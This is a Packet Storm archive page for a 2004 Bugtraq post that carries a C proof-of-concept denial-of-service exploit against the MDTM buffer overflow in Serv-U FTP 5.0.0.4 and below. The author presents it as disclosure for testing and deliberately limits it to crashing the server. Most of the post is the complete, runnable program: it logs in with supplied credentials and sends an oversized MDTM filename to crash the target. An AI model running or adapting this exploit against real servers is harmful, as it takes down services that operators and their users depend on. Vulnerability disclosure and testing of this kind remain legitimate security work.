what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

serv-u-mdtm-expl.c

serv-u-mdtm-expl.c
Posted Feb 26, 2004
Authored by Shaun Colley aka shaun2k2

Remote denial of service exploit that makes use of a command buffer overrun in Serv-U MDTM versions 5.0.0.4 and below.

tags | exploit, remote, denial of service, overflow
SHA-256 | b2d3006fc0646e31f2974ba75991ad575fe9b9f0032eb41efccfeb84a3983900

serv-u-mdtm-expl.c

Change Mirror Download
Hello Bugtraq,

I have written a PoC exploit for the MDTM command
buffer overflow found in Serv-U by bkbll. This
exploit only crashes the Serv-U server, as releasing a
arbitrary code execution exploit when the vendor has
not yet supplied a patch/fix is not a good idea when
certain unruly people might get their hands on it.
Here it is, test your systems, temporarily disable
Serv-U, and wait for the vendor to release a patch.


---START
/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow
PoC DoS exploit.
*
* This program will send an overly large filename
parameter when calling
* the Serv-U FTP MDTM command. Although arbitrary
code execution is
* possible upon successful execution of this
vulnerability, the vendor has
* not yet released a patch, so releasing such an
exploit could be disastrous
* in the hands of script kiddies. I might release a
full exploit to the
* public when a patch/fix is issued by the vendor of
Serv-U. This PoC
* exploit will simply crash the Serv-U server.
*
* This vulnerability was discovered by bkbll, you can
read his advisory on
* the issue here:
<http://www.cnhonker.com/advisory/serv-u.mdtm.txt>
*
* This vulnerability requires a valid login and
password to exploit! This
* PoC does not check to see if you supplied a correct
login and password.
*
* I do not take responsibility for this code.
*
* -shaun2k2
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
if(argc < 5) {
printf("Serv-U 'MDTM' buffer overflow
DoS exploit.\n");
printf("by shaun2k2 -
<shaunige@yahoo.co.uk>.\n\n");
printf("Usage: %s <host> <port>
<login> <password>\n", argv[0]);
exit(-1);
}

int sock;
char *explbuf;
char loginbuf[100];
char passwdbuf[100];
struct sockaddr_in dest;
struct hostent *he;

/* lookup IP address of supplied hostname. */
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve %s!\n",
argv[1]);
exit(-1);
}

/* create socket. */
if((sock = socket(AF_INET, SOCK_STREAM, 0)) <
0) {
perror("socket()");
exit(-1);
}

/* fill in address struct. */
dest.sin_family = AF_INET;
dest.sin_port = htons(atoi(argv[2]));
dest.sin_addr = *((struct in_addr
*)he->h_addr);

printf("Serv-U 'MDTM' buffer overflow DoS
exploit.\n");
printf("by shaun2k2 -
<shaunige@yahoo.co.uk>.\n\n");

printf("Crafting exploit buffer...\n\n");
/* craft exploit buffers. */
sprintf(loginbuf, "USER %s\n", argv[3]);
sprintf(passwdbuf, "PASS %s\n", argv[4]);
explbuf = "MDTM
20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt";


printf("[+] Connecting...\n");
if(connect(sock, (struct sockaddr *)&dest,
sizeof(struct sockaddr)) < 0) {
perror("connect()");
exit(-1);
}

printf("[+] Connected!\n\n");

printf("[+] Sending exploit buffers...\n");
sleep(1); /* give the serv-u server time to
sort itself out. */
send(sock, loginbuf, strlen(loginbuf), 0);
sleep(2); /* wait for 2 secs. */
send(sock, passwdbuf, strlen(passwdbuf), 0);
sleep(2); /* wait before sending large MDTM
command. */
send(sock, explbuf, strlen(explbuf), 0);
sleep(1); /* wait before closing the socket.
*/
printf("[+] Exploit buffer sent!\n\n");

close(sock);

printf("[+] Done! Check if the Serv-U server
has crashed.\n");

return(0);
}
---END

I hope you find this useful in some way...


Thank you for your time.
Shaun.





___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping"
your friends today! Download Messenger Now
http://uk.messenger.yahoo.com/download/index.html
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close